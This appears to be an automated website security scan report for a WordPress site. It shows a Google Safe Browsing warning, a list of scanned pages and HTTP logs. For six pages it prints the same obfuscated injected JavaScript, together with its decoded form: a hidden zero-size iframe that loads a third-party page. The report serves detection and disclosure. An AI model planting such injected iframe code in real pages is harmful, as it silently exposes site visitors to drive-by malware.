Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youwereremembered.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://youwereremembered.com/ | 200 OK Content-Length: 17772 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x3ccf=["%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%26%23%31%30%34%3B%26%23%31%31%36%3B%26%23%31%31%36%3B%26%23%31%31%32%3B%26%23%35%38%3B%26%23%34%37%3B%26%23%34%37%3B%26%23%39%37%3B%26%23%39%39%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%31%34%3B%26%23%31%30%30%3B%26%23%34%36%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%30%39%3B%26%23%34%36%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%30%35%3B%26%23%31%31%30%3B%26%23%31%30%30%3B%26%23%31%30%31%3B%26%23%31%32%30%3B%26%23%34%36%3B%26%23%31%31%32%3B%26%23%31%30%34%3B%26%23%31%31%32%3B%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E","write"];document[_0x3ccf[1]](unescape(_0x3ccf[0])); Decoded script: <iframe src="http://accord.com.sa/sa/index.php" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe> Antivirus reports:
| ||
http://youwereremembered.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://youwereremembered.com/feed/ | 200 OK Content-Length: 4479 Content-Type: text/xml | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x3ccf=["%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%26%23%31%30%34%3B%26%23%31%31%36%3B%26%23%31%31%36%3B%26%23%31%31%32%3B%26%23%35%38%3B%26%23%34%37%3B%26%23%34%37%3B%26%23%39%37%3B%26%23%39%39%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%31%34%3B%26%23%31%30%30%3B%26%23%34%36%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%30%39%3B%26%23%34%36%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%30%35%3B%26%23%31%31%30%3B%26%23%31%30%30%3B%26%23%31%30%31%3B%26%23%31%32%30%3B%26%23%34%36%3B%26%23%31%31%32%3B%26%23%31%30%34%3B%26%23%31%31%32%3B%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E","write"];document[_0x3ccf[1]](unescape(_0x3ccf[0])); Decoded script: <iframe src="http://accord.com.sa/sa/index.php" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe> Antivirus reports:
| ||
http://youwereremembered.com/test404page.js | 404 Not Found Content-Length: 12963 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x3ccf=["%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%26%23%31%30%34%3B%26%23%31%31%36%3B%26%23%31%31%36%3B%26%23%31%31%32%3B%26%23%35%38%3B%26%23%34%37%3B%26%23%34%37%3B%26%23%39%37%3B%26%23%39%39%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%31%34%3B%26%23%31%30%30%3B%26%23%34%36%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%30%39%3B%26%23%34%36%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%30%35%3B%26%23%31%31%30%3B%26%23%31%30%30%3B%26%23%31%30%31%3B%26%23%31%32%30%3B%26%23%34%36%3B%26%23%31%31%32%3B%26%23%31%30%34%3B%26%23%31%31%32%3B%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E","write"];document[_0x3ccf[1]](unescape(_0x3ccf[0])); Decoded script: <iframe src="http://accord.com.sa/sa/index.php" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe> Antivirus reports:
| ||
http://youwereremembered.com/prices/ | 200 OK Content-Length: 18599 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x3ccf=["%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%26%23%31%30%34%3B%26%23%31%31%36%3B%26%23%31%31%36%3B%26%23%31%31%32%3B%26%23%35%38%3B%26%23%34%37%3B%26%23%34%37%3B%26%23%39%37%3B%26%23%39%39%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%31%34%3B%26%23%31%30%30%3B%26%23%34%36%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%30%39%3B%26%23%34%36%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%30%35%3B%26%23%31%31%30%3B%26%23%31%30%30%3B%26%23%31%30%31%3B%26%23%31%32%30%3B%26%23%34%36%3B%26%23%31%31%32%3B%26%23%31%30%34%3B%26%23%31%31%32%3B%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E","write"];document[_0x3ccf[1]](unescape(_0x3ccf[0])); Decoded script: <iframe src="http://accord.com.sa/sa/index.php" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe> Antivirus reports:
| ||
http://youwereremembered.com/sign-up/ | HTTP/1.1 302 Found Connection: close Date: Sat, 10 Jan 2015 16:42:31 GMT Location: http://youwereremembered.com/wp-signup.php?Subscriptions=1/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 Phusion_Passenger/4.0.10 mod_bwlimited/1.4 mod_fcgid/2.3.9 Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://youwereremembered.com/wp-signup.php?subscriptions=1/ | 200 OK Content-Length: 18055 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x3ccf=["%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%26%23%31%30%34%3B%26%23%31%31%36%3B%26%23%31%31%36%3B%26%23%31%31%32%3B%26%23%35%38%3B%26%23%34%37%3B%26%23%34%37%3B%26%23%39%37%3B%26%23%39%39%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%31%34%3B%26%23%31%30%30%3B%26%23%34%36%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%30%39%3B%26%23%34%36%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%30%35%3B%26%23%31%31%30%3B%26%23%31%30%30%3B%26%23%31%30%31%3B%26%23%31%32%30%3B%26%23%34%36%3B%26%23%31%31%32%3B%26%23%31%30%34%3B%26%23%31%31%32%3B%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E","write"];document[_0x3ccf[1]](unescape(_0x3ccf[0])); Decoded script: <iframe src="http://accord.com.sa/sa/index.php" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe> Antivirus reports:
| ||
http://youwereremembered.com/log-in/ | 200 OK Content-Length: 16975 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x3ccf=["%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%26%23%31%30%34%3B%26%23%31%31%36%3B%26%23%31%31%36%3B%26%23%31%31%32%3B%26%23%35%38%3B%26%23%34%37%3B%26%23%34%37%3B%26%23%39%37%3B%26%23%39%39%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%31%34%3B%26%23%31%30%30%3B%26%23%34%36%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%30%39%3B%26%23%34%36%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%30%35%3B%26%23%31%31%30%3B%26%23%31%30%30%3B%26%23%31%30%31%3B%26%23%31%32%30%3B%26%23%34%36%3B%26%23%31%31%32%3B%26%23%31%30%34%3B%26%23%31%31%32%3B%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E","write"];document[_0x3ccf[1]](unescape(_0x3ccf[0])); Decoded script: <iframe src="http://accord.com.sa/sa/index.php" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe> Antivirus reports:
| ||
http://youwereremembered.com/help/ | 200 OK Content-Length: 17521 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x3ccf=["%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%26%23%31%30%34%3B%26%23%31%31%36%3B%26%23%31%31%36%3B%26%23%31%31%32%3B%26%23%35%38%3B%26%23%34%37%3B%26%23%34%37%3B%26%23%39%37%3B%26%23%39%39%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%31%34%3B%26%23%31%30%30%3B%26%23%34%36%3B%26%23%39%39%3B%26%23%31%31%31%3B%26%23%31%30%39%3B%26%23%34%36%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%31%35%3B%26%23%39%37%3B%26%23%34%37%3B%26%23%31%30%35%3B%26%23%31%31%30%3B%26%23%31%30%30%3B%26%23%31%30%31%3B%26%23%31%32%30%3B%26%23%34%36%3B%26%23%31%31%32%3B%26%23%31%30%34%3B%26%23%31%31%32%3B%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E","write"];document[_0x3ccf[1]](unescape(_0x3ccf[0])); Decoded script: <iframe src="http://accord.com.sa/sa/index.php" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youwereremembered.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 16:42:27 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 Phusion_Passenger/4.0.10 mod_bwlimited/1.4 mod_fcgid/2.3.9
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.youwereremembered.com
X-Pingback: http://youwereremembered.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: youwereremembered.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 16:42:27 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 Phusion_Passenger/4.0.10 mod_bwlimited/1.4 mod_fcgid/2.3.9
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.youwereremembered.com
X-Pingback: http://youwereremembered.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: youwereremembered.com
Referer: http://www.google.com/search?q=youwereremembered.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: youwereremembered.com
Referer: http://www.google.com/search?q=youwereremembered.com
Result:
The result is similar to the first query. There are no suspicious redirects found.